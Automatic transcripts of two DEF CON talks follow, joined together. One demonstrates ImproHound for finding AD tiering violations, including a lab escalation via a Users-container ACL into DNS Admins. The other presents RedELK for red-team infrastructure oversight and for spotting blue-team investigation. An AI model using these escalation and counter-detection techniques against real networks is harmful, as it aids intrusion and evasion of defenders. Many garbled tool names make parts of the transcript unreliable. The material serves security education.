bloodhound can really help attack us with that. So what can attack us so what can defenders do to try to prevent these domain takeovers is Microsoft has recommended to implement the tier model which means that you divide the AD into three tiers. So you have tier zero which is the most important servers that being domain controllers, PKI, ADFS and other systems that allow one to take over the rest of the domain. Then you have tier one which are the normal servers and then tier two are the workstations and devices that you the regular users of the company interact with. And the idea is that if an attacker for example get a shell in tier one the attacker should not be able to compromise anything from tier zero at least not using credential stealing or abusing permission set in ACL in the AD. So what does it mean to implement tiering in an environment? That means to implement logon restrictions and control restrictions. The logon restrictions will protect against the credential stealing so that means that you will create separate accounts for each tier. So let's say you have an assist admin that needs to manage many systems across all the three tiers then that user or this person will have a separate account for each tier because his tier zero domain admin user will only be able to log into tier zero systems so we prevent that the credentials of this user will exist in tier one and tier two and thereby attackers cannot steal the credentials of the domain admin in other tiers than tier zero. Microsoft suggests that you could allow tier one users to log into tier zero so that will be like this error here. If you ask me then this is a really bad idea because then you will have tier one users and tier zero users log into the same system and then you have an ability. So yeah you shouldn't allow this one and of course the same principle true for tier two and tier one. The control restrictions they are protecting against abusing ACL permissions so that means that all AD objects that belong to tier zero they are allowed to have permissions on other AD objects in every tier so that like the green error and the yellow error of course only by as required by role but there is no way at tier one admin or tier one computer or group GPO should have any permissions on tier zero systems and of course the same for tier two to tier one. So I was in need of two to actually identify the attack paths that breaks these tiering lines because it is very often when people try to implement tiering it doesn't go so well because of service accounts for example it is easy enough to tell an admin user to use three different accounts for three different set of servers but it is another story with service accounts of course and there are really many things where tiering is hard to implement especially when it is a big messy AD environment and as already said it is difficult to look through all the ACLs manually so I was in need of a tool so that is why I created the impround and what impround does is that it connects to the bloodhound database which is Neo4j graph database so in order to use impround you need to run bloodhound as you will normally do collect all the data with the collection method all and local GPO so you get all the data imported through bloodhound and then the data will automatically be stored in the Neo4j database and then you can connect to the database with the impround and yeah I will now show you how it works I have this small test environment here yeah so this is my test environment where I have three tiers I have made an OU for each tier and put in some accounts and servers very few and I have left like the building groups in users and building I have just left them where they are initially so and then I ran bloodhound and I have my bloodhound in this here I have my bloodhound and you can see that I have only a few users in groups and OUs and a few GPOs as well yeah so in order to use impround you have to download it from GitHub it's an open source tool so you can also check out the source code and I have a blog post made a demo video and some install instruction and user guide and some guidelines so you can check all that out if you like or just download the tool I have already done that so I have it here so you will be prompted to log in with the same credentials you use for the bloodhound database and here will be shown the OU structure of the domain you have collected data from if you have more the domains that will be placed under here so here we see the same structure as we saw just before of course there's not all the building containers that are not so relevant for attacking AD because bloodhound does not collect like font security principle keys and stuff like that yeah so what you will do here is to set a tier level for each object it will by default set some permissions so based on some assumptions for example that administrators of course CS0 and the group users belongs to CSU so if you want to change some of these groups for example let's say you have domain admins let's try to put that into tier 3 and then let's say that we need all the members to be in tier 3 as well so we use this button and I will show that the built-in administrator changes to tier 3 as well yep let's just set that back again you can also set all the children of an OU container to a specific tier so tier 0 we like to have that in tier 0 of course to use this button and then all the children of this OU is now tier 0 do the same for this one and of course also this one when you think you're done with setting the tier levels of all the objects then you can use this button set tier for a GPOS and that will ensure that all the GPOS are in the right tier and in the way that if a GPOS is linked to a tier 0 OU then it will be a tier 0 GPOS because then you can use that GPOS to add just of administrators of all the servers that are in this tier 0 OU if a GPOS is linked to only tier 1 OU then it will be a tier 1 GPOS so let's see what happens when we click this button you see that this GPOS changed to tier 1 and I think also this one changed yes when you complete it done then you can click this button to get the tiering violations and you'll get that as to CSV files let's go and check those out and also use this button to delete the tiering in the database so impound will create some labels and add those labels to the bloodhound database you will not see them in bloodhound but you'll be in the database and you can delete that using this button so here we have the CSV files and we're going to copy those to a machine where I have Excel here we go and data which is E and here we have the first one here is called AD objects and that is just a long list of all the objects in the main and which tier level you have put them in so that's a file so you can double check that you have done it correctly and put all the objects in right here and later you can use it as a and check where do I put this group because I found out that it actually belongs to a tier zero and I thought it was a tier two group or something and let's take the other file tiering violations so there's only very few tiering violations in my every small domain and that is this user which belongs to tier one it's called T1 admin and it has these permissions to the right owner right daggle owns on a GPO that's in tier zero the name of the zero zero enable PowerShell script log logging so this is something I've seen in a real environment that a server admin which belongs to tier one creates a GPO link it to the tier one servers and then later at tier zero admin sees this GPO and thinks oh this is a great GPO link that to the tier zero servers as well but that's a problem because the tier one admin still has permissions on this GPO so now the tier one admin can actually take over all the tier zero servers which this GPO is applied to so yeah that is something you could like report to a client if you use the imprownd in an environment now I would like to talk a little bit about what imprownd cannot do yeah there's some limitations in bloodhound and this is really not to point fingers at the spectra or anything because I really think it's great that these guys have made the bloodhound it's really amazing I'm very thankful though that they did that and make it public and free but there are some limitations bloodhound does not collect user rights assignments for the domain joint devices windows machines so we cannot check if users are actually allowed to log into systems in tiering that would be to check whether or not the domain admins are still able or capable of logging into let's say workstations which is a default thing which should be prevented because if the main admins has this permission it will be used at some point so another thing but yeah and I also have to say that it's also very difficult to to collect all these user rights assignment because they are on the machine only so you cannot and you cannot collect it without logging in as administrator on a system to actually collect that and of course that not functionality that bloodhound has right now you could collect it from GPOs that are linked to servers or workstations but it will be difficult to figure out these user rights assignments and there will be no guarantee that these users can actually log on because it also depends on of course what's open in the firewall and what services are running and many things yeah another thing bloodhound does not collect all AD permissions and I found one that should be collected but isn't and I can actually show you that because I've made that one in my lab so just go to my lab here and look at the security of this so this user G2 user has full control on this object only and that was the user container users container that means that it has full control on only the container so users contains all these built-in groups but the G2 user has only permission on the container not the container and I can actually show you that this can be exploited because I've actually allowed this G2 user to log on on my domain controller that is of course a finding as well if I can type in the password correctly success okay and then I will open my hack here and let's first start off with who am I slash all so we are the G2 user and we are a member of built-in users authenticated users but not any previous group but yeah let's try to add ourselves to DNS admins and domain admins see what happens and we get some errors because we do not have the permissions to that but if we add a new AC in the ACL of users we can actually do it so this will allow us to have generic all on all so that means this permission will be inherited to other objects or to children objects of users and now we can do this and now we only get an error for domain admins and not for DNS admins so now we are the remember of the DNS admins boom and as yeah it doesn't it doesn't work for domain admins because domain admins is a protected group in AD so it will have the security description for from admin sd holder but DNS admins are not a protected group so we can actually add ourselves to DNS admins and as you probably already know DNS admins can escalate to domain admins if DNS is hosted on the domain controller which is very usual usually the case yeah and let's just verify that this is not something you can find in blot hum here we go let's search for to user here it is and DNS admins yeah no query or no result from the query so yeah that is of course something you should check yourself and you can see that it doesn't show anything but the fact that the tier 2 user is a member of domain users yeah I have created the issue on GitHub to let the guys from spectrums know about this issue and they will probably fix it at some point but yeah so right now you need to check for some configuration mistakes manually when you are using impr want to find yeah or when you are trying to find the attack pass that breaks the tier model yeah so that was actually all I had to say I hope you enjoyed the presentation it was really a great honor for me to be speaking this awesome village and I hope you all will have a great DEF CON bye
It is not viable for system administrators and defenders in a large Active Directory (AD) environment to ensure all AD objects have only the exact permissions they need. Microsoft also realised that, why they recommended organizations to implement the AD tier model: Split the AD into three tiers and focus on preventing attack paths leading from one tier to a more business critical tier. The concept is great, as it in theory prevents adversaries from gaining access to the server tiers (Tier 1 and 0) when they have obtained a shell on a workstation (Tier 2) i.e. through phishing, and it prevents adversaries from gaining access to the Domain Admins, Domain Controllers, etc. in Tier 0 when they have got a shell on a web server i.e. through an RCE vulnerability. But it turns out to be rather difficult to implement the tiering concept in AD, why most organizations fail it and end up leaving security gaps. It doesn’t help on the organization’s motivation to make sure their tiering is sound, when Microsoft now call it the AD tier model “legacy” and have replaced it with the more cloud-focused enterprise access model: https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model#evolution-from-the-legacy-ad-tier-model As a person hired to help identify the vulnerabilities in an organization, you want to find and report the attack paths of their AD. BloodHound is well-known and great tool for revealing some of the hidden and often unintended relationships within an AD environment and can be used to identify highly complex chained attack paths that would otherwise be almost impossible to identify. It is great for finding the shortest attack path from a compromised user or computer to a desired target, but it is not built to find and report attack paths between tiers.. I will in my presentation explain and demonstrate a tool I have created called ImproHound, which take advantage of BloodHound’s graph database to identify and report the misconfigurations and security flaws that breaks the tiering of an AD environment. ImproHound is a FOSS tool and available on GitHub: https://github.com/improsec/ImproHound
10.5446/54345 (DOI)
Hi everybody, welcome to my Defcon 29 Adversary Village talk. It's called Exploiting Blue Team Upsack Figures with Red Oak. My name is Marksmates and I hope you like the presentation. I will be available in the Discord room or you can ask me questions anytime later after talk. You can hit me up via Twitter or some other way that you can find me. So let's dive into the talk. Exploiting Blue Team Upsack Figures with Red Oak. A lot to dive into. A little bit about me for who doesn't know who I am. My name is Marksmates. Hobby wise I'm from InfoSeclares over 1998, professionally since 2006. And I have a very big background in System Network Engineering and from 2006 I started doing pen testing. In 2016 I co-founded a company called Outflank which you might know or might not know. My core roles in there are Red Team Operations as well as building some tools and doing some of the trainings that we have created within Outflank. Mainly on the offensive side, mainly on the red side. I also have a little bit of experience on the Blue Team side at some of our clients where I had some threatening experience which is actually pretty fun to do. So that's me, the company Outflank. We are a boutique firm. We specialize in red teaming as well as trainings mainly aimed for blue. Although nowadays we also have a red aimed training and we have tooling. Since the beginning, since 2016, we have created lots of tools, given lots of presentations and the majority of our tools are available on our GitHub. Although during the time we have come aware of the fact that some tools are simply too powerful to be shared publicly online and that's why we have created just a few months ago our Outflank security tooling service which is basically our private tool set of all the tools that we use during our engagements that are too powerful to be used during operations. Hats up, those tools also integrate into what is Red Elk. And that's where this is the topic of today. So we're busting Blue Team Opset figures with Red Elk. Red Elk is the tooling and I want to dive through well the whole concept of Red Elk, what it is, why we have created it and how you can use it. And then of course there is the whole Blue Team side. And the Blue Team makes mistakes as well. Opset mistakes the same as Red Team does. So those are the main two topics for today. But before we dive into that broader sense we need to discuss how we, with me, we, I mean Outflank as well as myself, how we see Red Teaming. If there's one thing that I would like you to take away from this talk is that we believe that Red exists solely to improve Blue. Yes we do similarly to the Elks but it's not a wrecking ball approach. It's not that we come by, smash everything apart, knock down the Blue Team, walk away, loot the gold and start laughing. No, no, far from. We see it as a sparring match. We see it as a training for Blue which means that it's fundamentally a different goal. We try to train the weaknesses of the Blue Team and try to improve them for actually when the real deal happens with the real attackers. Yes, our simulations, our Red Team engagements contain real punches, real movements. It actually may hurt both sides but it's always better to have a practice hit on your face than a real hit on your face. So we exist to train Blue. No wrecking ball. When we are talking about our boxing ring if you like, just a quick overview of how a modern offensive infrastructure would look like. Most likely yours looks about the same conceptually wise although there are many different technical bits and pieces. Going from right to left we first have our own attacking infrastructure while we have our command and control servers, multiple most likely. We have our delivery services, web services where we do tracking. We have all kinds of decoy things. We might have social media profiles all on the true infrastructure that is on your own, a span of control. On the complete left side there is the victim network or the target network where you eventually have your implant running that goes back via HTTP or DNS or some other spooky protocol that you have as well as internally within that victim network. You've got your things running, your implants connected, things like that. In the middle there is what we roughly call read-eye characters or deflecting ways. It's in the modern nature of the modern times with cloud-enabled infrastructure. It's very easy to have lots of flexible disposable resilience systems in there that is just simply a layer in between to obfuscate some of your own true attacking infrastructure as well as making some smart decisions in the goal. Nothing near here I hope but there is a reason that I'm telling you this because this concept can become quite big if you count the amount of components that you have for your offensive infrastructure during operations. So let's talk about a single engagement which might have several scenarios. For example if you use a type of a based approach for a red team you will have multiple scenarios within the same operation which also means that you will have multiple C2 servers. Typical engagement for us around five different C2 servers. We also have multiple reader vectors, reverse proxies, things like that. The main fronting CDN type players, multiple. You'll be creating multiple fake identities to do well the whole social area thing. You might create a website, I wanted to. Tracking pixels everywhere. We track everything both in emails as in delivery as in multiple different aspects. Tracking pixels, tracking pixels, tracking pixels. You need to be catching them, you need to be setting them up. It's things to manage. And I don't know the delivery side. We got multiple web servers, multiple email boxes, maybe some file sharing services, messaging platforms, whatever all the new hot stuff there is. But there's multiple aspects that you need to manage. That's all front facing. On your back end side you will have generic backend components. Let's talk about communication channels that you have internally with your team or also with the white team. You will have your own test labs. You will have all kinds of log aggregation. A log aggregation is where red health actually comes in. The reason I'm telling you this is that it, this is our boxing ring. This is what we need to use. And it's becoming quite big per operation. And even if you have multiple operations at the same time, which many red team affirms actually do, to keep track of that infrastructure is actually becoming challenging. It's not something that it cannot be solved, but it's becoming challenging. So when we look at our offensive infrastructure we have two main typical challenges. One being oversight. The other one being insight. With oversight I mean just keeping track of where your infrastructure is. What the state of it is it up? Is it running? Is it okay? Is it in some way you are hurting your own infrastructure? Multiple components. Multiple different things. Multiple engagements all together. A lot of data components to keep track of. Insight is more oriented on the fact, well besides if it's up and running, is there data in there that can help us to do a better operation? Do we have the proper insight over infrastructure? Looking at other fields we see quite a resemblance if you look on how those challenges are being solved. So if we look at Cowboys, I just said the name at the term herding. To some extent we need to have heard our own infrastructure. And Cowboys have the same way of hurting their cattle. They use dogs to keep everything in control. And that gives them some way to manage the herd in that sense. If you look at the inside I'd like to refer back to Mr. Edmund Locage which was actually the true Schuller-Bolms. He was a French the French Schuller-Bolms and he was the one who put forensic science into the field of forensics. He was the one first to start measuring things. Having forensic approaches to having academic approaches to forensic science, scientific approaches. The early 20th century and why do I bring in this guy into the talk? Because he's most famous known for his own the Locage exchange principle which means every contact leaves a trace. This is actually very much true for our own operation. As you know every offensive action that we do it will leave a trace on the system. It's up to blue to digest, to see and digest and inspect the trace but it's impossible to touch a system to perform an action to remotely do something without leaving a trace. But now it's the fun thing. It also goes the other way around. It's impossible for blue to do things without leaving a trace. So if you know where you need to look for both blue side as well as red sides you can see actions of the other ones going. And if you're looking if you're talking about traces by adversaries, by red teams, it's quite common to have a thing like a seam or have a security operation center, a cyber defense center or anyway a team of people investigating traces and seeing things. The other way around, well during operations we were in need of such a thing. So looking at the tools that we had at place there is ways of hurting your infrastructure and we needed a way to actually do some investigation on our infrastructure. We started looking in the open source world and we didn't find anything and that is what actually Red Elk came about. Red Elk is a tool ready to be used open sourced. It's available on our GitHub and you can use it for keeping oversight of your infrastructure as well as having insight into what is happening in the operation. And it's important to understand both aspects of this. And Red Elk is during operation by us and by the other ones we use it most often used. You've got your live hacking console of your C2 infrastructure, your C2 server, your COPS pipeline for example. You do your live hacky hacky hacky commands and then there is a second window open where you have the Red Elk interface, web interface Red Elk available and it helps you with just having well the oversight of the operation inside and you will see traffic data coming in, operation data coming in etc etc. Like I said it's available on our GitHub and I've written a few blog posts explaining why we need it, getting you up and running and achieving operational oversight and in the next few months there will be some more blogs probably coming out. Red Elk, the name of course comes from Red being offensively oriented and Elk being Elasticsearch, Logstash, Kibana, the technical stack that we choose for actually making this tool. So diving into Red Elk, looking at your infrastructure again, slightly different approach to this. On the most left you have the target network, you've got your implant running, so there's attack and C2 traffic going first to your redirectors or your first line infra and from there on it's being filtered and is being put on to your C2 service that you have in your backend. Nothing near here. How does Red Elk fit into this whole process? Well here you go Red Elk. It's a year of local infrastructure, we have it on-prem. You could be running it in cloud, we prefer to have it on-prem, but there are connectors installed both on your redirectors as well as on your C2 servers. Data connectors, data feeds, we use file data a lot and from there on it is put into a Logstash filtering and it's put into an Elastic Northquall database and Kibana is the interface, the web interface is actually searching through the data. And that goes both for the redirectors as well as for the C2 server components or you could be hosting your own website or whatever. You can pull the data and actually put it into the index of Red Elk and there's also data copy happening on the back end, so there are some arcing scripts happening to actually copy downloaded files to have screenshots and all kinds of other operations on data of your operation and put it back to your central Red Elk server because well in the end you will have five, six or whatever C2 servers for a single operation and you do not want to be logging into every specific C2 server to search for that specific screenshot. You want to have it all centrally, locally in your Red Elk instance. Red Elk does a few things, it indexes data, it enriches data that is coming in, it has lots of dashboards in there, you can create your own dashboards and there's lots of search, well it's a search-based solution, so that's the core functionality of any Logstash or Elastic Stack. It's based on open source tools so you can modify it yourself and change dashboards or whatever you can are free to do that for yourself. In the race and versions we have also added a Neo4j Docker instance as well as a Jupyter notebook of Docker instance, meaning that the Neo4j is used to import output from Bloodhound. So besides the Elastic Stack you will have also a Docker instance with Neo4j and you have a Jupyter notebook for quick searching through data and this is really awesome because now you have operational data of your C2 infrastructure as well as from traffic data but you also have knowledge about the active directory environment of your target and by using the power of Jupyter notebooks you can make very quick queries on pooling data or matching data both output from your C2 server as well as data that is within your Neo4j instance. For example you could be searching for usernames that are or new incoming beacons pick out the username and immediately go through your Neo4j instance and see what if this is a path going to actually domain admin or any type of admin code that you would like. The Jupyter notebooks is a way to actually quickly make those queries and have you quick generate quick output. It's really awesome and once you get to use it it's really powerful during the operation. That's the core RedOg with both the Red team and you might as well give the Y team some access to dashboards and as well as you hold the whole interface right now we mainly use for the Red team and we use Jupyter notebooks to make data extracts that we can give to the Y team but do your thing you can quickly give access to your Y team give the Y team access to Red out. But looking at the oversight there's still a target SOC or a SOC within the target network and as analysts do they start analyzing when they have a hunch of something that's going bad. So they are doing several things they are in analyzing investigating your info so they might be querying your specific reader vectors or they will put data onto what I call online security search providers. Think Spamhouse, VirusTotal, IBM X4, multiple different domain classifiers, Spam sandboxes, all kinds of different ways of analyzing pieces of malware as well as infrastructure. Now it's the fun thing that those security search providers as well will be there's these are automated things they start querying your infrastructure as well. So if you look at the log data of your reader vector you will see you might have the option of actually having a SOC analyst investigating as well as some online security search providers they might be investigating your infrastructure they might be querying it they might be looking at your specific URI path of your implant with different user agents for example. Now we're getting into the whole scene part because if you have a big pile of logs about your operations C2 service as well as from your reader vectors traffic data you've got a big pile of logs and you have a rule-based approach of looking for things that might be suspicious in your own data as well as querying online resources like VirusTotal to see if an IUC of your own implant or your own uploaded file is already known at VirusTotal for example. Well all of a sudden you have a scene type of functionality. So this is where Red Hat folks fits in into the bigger picture. If you look at the logs of your reader vector as well as your C2 service you will see that there's not that much data in there so we will be needing to do some enrichment and this is where well the data enrichment that we have when Red Hat comes in we do multiple things. If we talk about traffic data we map it to GYP data we check if it's a TORG based address we take your ownership from IANA databases we look at reverse DNS and all that type of data we put it into the same record and it's stored within the stack within the database. We also query grey noise and for those who do not know grey noise, grey noise is an excellent tool for seeing if it's the traffic that hits you if it's background noise of the internet just a note. Background noise of the internet is just the common scanners. It could be Google indexing or could be common type of or C2 botnets or it could be regular botnets that are just querying the internet scanners things like that. It is created for blue teams but it also for red oriented amids also very interesting because if an address that is querying our infrastructure on a very specific path that matches or is our implant path and it is not known by grey noise then most likely you want to be aware of it and most likely an analyst is actually looking into it into looking into your operation. If it's just if it's known by grey noise it's most likely just something like the background noise of the internet. Online resources we can check at Harvard analysis, Virustodo, the abuse databases, IBM X-Force, multiple online resources that we can query and take data from and use that for enrichment of the data within our stack and if you talk about C2 data there is a component within Red Hat that takes the logs from the C2 frameworks. It needs to be aware of how it is the logs are being set up and needs to enrich them and that's what we do. We have full support for Cobblestrike, up to the latest version, as well as our own custom on-slank Stage 1 C2 which is also part of our tooling offering. Full support in there and we are working for the other public ones. Part C2 is let's say halfway, basic logs are being ingested but the data copying of screenshots and things like that is not yet fully done. About the same stage for Mythic, Mythic has created an option, a seam-logging option that you need to enable if you install the team server and there on if you install the Red Hat component it actually takes away, takes up the logs ingests and properly but there's no data copying happening on screenshots just yet working on that. On the Longer Road map we're also working at Covenant as well as Skype and you are free to make your own, connect it to your own C2 infrastructure or your own C2 tool. In the end it's just based on normal log-stage rules. It's all open source and you can go nuts or do like it. Okay, data enrichment. It's a lot about talking about what we do. Let's see how it works into practice. Let's start with the interface that you as a vet team operator will see and from there on we go into investigation of our blue team's blue team activity. First about, let's see how it works. Kibana is the web interface and from here on you just log in to the interface. Use the name password base and from here on you will see that it's a normal Kibana interface and we have several pre-made views for you that are most commonly used meaning that it has the right columns and right names and the right filters already made. So I click here on the redirect traffic meaning that it will give you a tabular view of in this case the last seven days of traffic that came in on anywhere where the data has been taken from. You will see that there is a timestamp, an attack scenario, the back-end name of the redirect traffic source dns and the extra instance we request. The attack scenario is an important one because during an operation you will most likely have short-haul, long-haul or scenario one, scenario two, scenario x if you're using a Tyro. So multiple scenarios during that specific attack and all the other names actually make sense if you look at the specific index we're talking about. So if we talk about redirect traffic let's go actually use that. So let's filter this is just normal Kibana interface stuff. Let's filter on only seeing attack scenario, a short-haul. You can expand the data component or the object and you will see that there's GUIP data being enriched. You will see the full log message as it was provided within the log and you will see several aspects as in the actual IP address of the font address, the name that you used at the refresh proxy name, so the font-end name. The program I was used in this case was Apache. You will also see that it knows how to digest the different headers. In this case it makes sense because it was done via a CDN network and a CDN actually puts in the proper exported for headers etc. That's been taken up by RELG and it replaces to have the proper source IP investment there. Lots of chopping data in there happening and it presents you an easy and credible interface. If we talk about C2 logs, so no traffic logs but talking about your own C2 logs then we have the same approach. It's still the same division between multiples attack scenarios. You will already see that there isn't a target username, target IP, IP, internal IP address, hosting, things like that. That is the normal log message from Cobbersrike and you will see that for every action within Cobbersrike being done it has mapped the data from the top line being the username, IP address etc. You can click on the link to have the full beacon log which most often can be pretty big and from here on within your browser you can do simply Ctrl F to do quicker viewing. Sometimes just having such beacon log in text space is actually easier to use than the Kibana interface. So from the Kibana interface you have immediately just clicky, you will have the actual beacon log. Same goes for the other C2 frameworks. Now in some cases you have during your operation, you have made multiple screenshots and going back you will remember while there was this one system where I had this screenshot that kind of looks like it had this specific application in there. Well Kibana or Redhack has an interface with quick previews as well as full click to full resolution screenshots and more directly available to your web interface. So because it's pulling from all the different team servers there's no need to log into all the different team servers. The same goes for keystrokes as well as downloaded files. Another one is a central overview of all your IOCs. As you know that Cobbersrike and your C2 framework will generate an IOC indicator that is being adjusted and from here on you have that view. You can search through it but with the power of Kibana you will also have the option to quickly just export the data and present it to your writing. So you go to share, you will click on csv report, you will generate the csv file. It will take some time but now the Redhack interface or the Redhack service is making the interface the file for you and it's just a csv based of the tab that you see right now. The same can be done with Jupyter notebooks but from here on it's just a a quick click away of having data in there. Easy to use. This is about operation. It might be already that you think well this might be useful for your operation. Well I hope you do because it actually is really useful during your eventing operations. Let's talk about spotting Bluetooth in activity. There are multiple ways, multiple areas and where we could be spotting any action of well action of a Bluetooth team and where they leave traces. I'm talking about directly to your info so traffic that is directly hitting our offensive infrastructure. Got a few examples in here. We also have got indirect where we are querying online security service providers for any Bluetooth activity and then there's a third category where we're talking about internal checks. So checks that you're in-plant that is already inside the target network running. It can do some queries and if it's doing the proper queries you will might spot some activity of the Bluetooth team. Some of these are fully included into Redhack. Some we are working on and some are for a longer approach but first we want to talk about the concept and then we can talk about the specifics that are implemented in Redhack as well and if you believe that we are not quick enough with development it's an open source project come join us, come help us. We need to discuss how the redirectors make the decision and how Redhack feeds into this. So when we're talking about traffic that is originating from the actual implant that's one way. The other traffic that might be hitting a redirector is non-target related. It could be scanners, it could be just a regular internet traffic. Your redirector makes a decision based on whatever rule you put in there so this is just a HA proxy or Pachi or any way that you configure your reverse proxy and it will make a decision to either forward that session to the back end, your true C2 back end or a decode website or forward to a different website. The logs that are being put out by HA proxy or Pachi or NGNX or whatever reverse proxy that you use those are being ingested by Redhack and you will you saw them in the interface. But for Redhack it's important to have the proper logging so when you do the installation you actually need to change the logging of your reverse proxy tooling but also specific requirements for the naming of your back ends. If you, that needs to be aware of what is a decoy and what is a C2 back end so any type of C2 could be or should be named with C2- whatever. Any type of decoy or deflecting should be starting with decoy and dash and then whatever. Based on that decision Redhack will also help you with alarms. The Redhack is making decisions that's important. Okay once you have that up and running you will see in the interface of Redhack that well an analyst might be connecting to your infra could be well eventually be rooted to a decoy website or both to or to a C2 back end and especially traffic going to your C2 back end is interesting and more than once you will see or at least we have seen and I guess you will as well that when a blue team is doing an investigation manual investigation they're using Python or Curl or maybe PowerShell or and not very not every time it will be changing the actual user agent so well you will see Python user agents coming in and more than once we've seen that they first tried it from the breakout point of their SOC internet uplink but also maybe via a top address so multiple ways that will be querying your and depending on the actual path and the back end that is being chosen by a Redhack this is interesting to see well is there any happening any investigation going on. Another one that once you have the logs in there is interesting to see is that if they are the blue team is sharing the URL of a thing to be investigated some instant messaging clients actually try to preview that specific website so in this case it's an example of Telegram but all the other ones are basically the same they will try to make a preview and as you type they for every new character they will be trying to get a preview of the door so they will be connecting to that host. Interesting to see and a clear indicator if well you see these types of instant instant messaging apps with the user agent come by and querying your C2 back end infrastructure that's interesting so that's directly oriented at your own infra let's talk about indirect so via online security service providers what i'm showing you here is the interface that a blue team would have in this case for a semantic the adr products in the ATP and i've highlighted those little checks or options where it says submit to send box or submit to virus total well you might think that's not smart to do because once it's in virus total it will have a hash and we as a red team we know the hashes over our pieces of malware so we can query virus total will have few good results for this specific hash and virus total will tell you no it's not or if it's there then most likely as we have not uploaded the malware piece ourselves the blue team has and then there is a big indicator that you have been compromised but the attack is compromised any blue team should know this but it's made very easy for them to still click on the button this is semantic this is marksoft the wd ATP so the malware protection central portal there is a check for virus total and there is an option of clicking it to or submit it to their deep analysis which is just a sandbox it's made very easy for them to click on those links talking about sandboxes you could be deflecting traffic from your coming from sandboxes based on source IP address to a specific decode backend or your reader vector or you could just let them come in either way you could be check the characteristics of that AV sandbox connection and have an alarm in there having a clear indicator so doing some tests during a training that we did this is just a mapping of I believe it was over of an eight hour period when on purpose we actually tried to hit sandbox connections just to have a bigger data set of how sandbox connections looks like and it's most likely maps back to your own experience that you might have with sandbox connection the funny thing is that they are not very creative with the naming so on the right side you will see the actual names of the computers and on the horizontal bar you will see the different students that they have tried to and the amount of new AV begins that so let me just zoom in you will see the names that you will probably recognize at an NPC jumpy see to kill boom boom virtual pc admin dash something when dash all the typical windows evaluation images not very creative so this is a clear indicator which of course you already know is that there is something fishy going on but we could also generate alarms based on this even if it's not coming back to the C2 backend another one that I want to highlight is domain classification here you will see where that already does this there is a conflict file where you enter domain names and from there on in this case I entered outflank.no and it's querying on the x-force macfee as well as blue code in a pretty other way and you will see that for some reason at again x-force we have an error getting a reputation but that's okay we still have two left and what's interesting here to see or to look for is changes in those classifications and to see if it's actually a bad reputation so if it's a rogue type of thing we went through all the different data or the different classification groups that those domain classifiers have we picked out the rogue ones and as soon as there is a mapping of your domain into one of those categories you should be getting an alarm interesting other area we can do spotting losing activity is on the internal so checks on the internal way of coming from your implant on the internal network and let me give you just a few examples first of all the damn nasty kary b tgt many networks still have not an automated way of changing the password with kary b tgt so if you come into a network and you will see that in this case even 2010 the last password set of that specific contrast 2010 and later on in your operation all of a sudden is being reset well chances are big that it was a blue team initiated change so the kary b tgt is very specific but you can use the the the the same thing for specific admin accounts or other accounts and it's hard to judge when a normal password change would be but if you have five admin accounts and all of a sudden they are changed in the last day it's a clear indicator that well if all admins start changing their passwords they are onto something so bluejack is a thing that helps you with actually outputting this information it's a it's a calm-based thing that communicates via atzi and it outputs in a certain way that red dog actually is able to ingest i'm not sure if we have open source did just yet how about certificates here we do a set check for a specific website our atzi.nl website and this check gets the data from the certificate out it checks to see if it's being ssl intercepted or if there's a ssl intercepting a corporate proxy in a way if this changes during an operation then the blue team has well enabled ssl interceptions which they might often not always do from the beginning and it's a clear indicator that what something has changed you need to be aware of or blue team investigations okay as a summary if we're talking about direct based types of indicators of investigation or maybe we should call it indicator of analysis or indicator of detection i don't know i don't care but if we look at directly based things we can check for analyst traffic so specific tor ip addresses curl user agents got that are going straight to your c2 backend that's a clear indicator for analysis deflected traffic for some reason your redeactor logic has said well we need to deflect this to our decoy website or something we can make alarms based on that blue code other specific security vendors have very specific ways of querying your infrastructure and you can have insight into the data and later on we can have alarms on that as well it's messaging i show you a funny thing is if you have if you know the ip ranges of blue teams which you might know over some time if those ip ranges are connecting to your infrastructure and even if they go to a decoy if they are going to deflected decoy backend or if they go to your true c2 backend you want to be aware of any type of blue team ip address accessing your infrastructure because it's immediately is that suspicious and then there is generic c2 scanners and av send boxes having red dog you will have proper insight into what those c2 scanners are doing and where they're coming from not directly alarm related but it's very helpful to have that insight that's on a direct traffic if we talk about indirect we're talking about av hash let's check virus total hardware analysis but it's also an infrared list so if you have configured to render if they are if it's aware of the URLs that you use if you're right ip addresses of the infrastructure specific tls sets so the the hash of your set we can check that data onto public lists of known ip bad ip addresses URLs and certificates and the domain classifiers i already showed you looking at the internal sites we can check for the password resets a tls interception another one that we have already included is the security tool checks so an unexpected change of the ida tool is being installed that's a clear indicator all of a sudden they have done something for more investigation we are working on checks for lock forwarding security config as well as accounts login where we lock forwarding if there is a change all of a sudden weff is being enabled or winlock leaders being enabled things like that it's a clear indicator that something has changed that you need to be aware of and most likely is related to blue team activity we can check for six very specific security config changes this is a very broad topic but there's a category that needs to be mentioned so if you have an implant doing some checks and all of a sudden well you can check many different security parameters local security policies and if those change why would they be changing during operation and then there is an unexpected change of the accounts are logging in if you land on an inbox and if you go through the winners event view of the past 10 logins or the past 100 logins you will most often see a clear approach of what accounts are logging into this machine all of a sudden you see service accounts logging in or all kinds of different things in my view or in my indicator for you that you're not as stealthy as you think how to get started um we need to tell you a few things on the planning side a red elk installation is intended per operation could be having multiple scenarios but it's for one client if you like so do not mix client do not make a send for red exo for where you put into everything together you want a new system because it contains highly confidential data you want a new system after the operation it has three main components the red elk server itself a connector that you install on your c2 servers and a connector that you install on your redirectors there are several important identifiers used during the operation and you want to make them clear at the beginning of the installation that is the attack scenario name that you use as well as the component name that you use the component name is interesting or relevant for the c2 servers and redirectors and the attack scenario as well those are also parameters that you need to put on to the installer on the c2 server as well as the redirector an important thing to know and i mentioned it before is that the default logging of Apache or haproxy or any type of other a vfx proxy is not sufficient we've put on the wiki which is on github and both on the blog post series we have told you or we put examples conflicts in the red elk code as well how you change the logging to be specifically ready for Apache to include header logging and the explicit names of the front and the back end things like that is already in there but you need to enable it otherwise well red elk is blind for traffic data then you do the installation you get the release or get up or you can just try the master branch whatever you like then there is a first step in creating certificates and the installation packages for both the elk server the c2 server as well as the redirector you do that with the initial setup you generate certificates that are being used for the transport of the data from those other components back to the red elk server it's encrypted tless encrypted you need to configure that and from there on you run the installers on your readers on your c2 servers as well on the main red elk server and very important there are post installation configurations that need to be done and you will find that on the elk server at the that specific part that you will see there there you enable specific alarms and other kinds of things and it's all explained into the documentation that we have both on github as well in the blockpost series a little bit about the roadmap version one which was 2018 2019 i believe we focused mainly on oversight and not very much on the alarms we had support for copet strike h8 proxy and as well as a patch reader vectors but version two where they've been working on since it 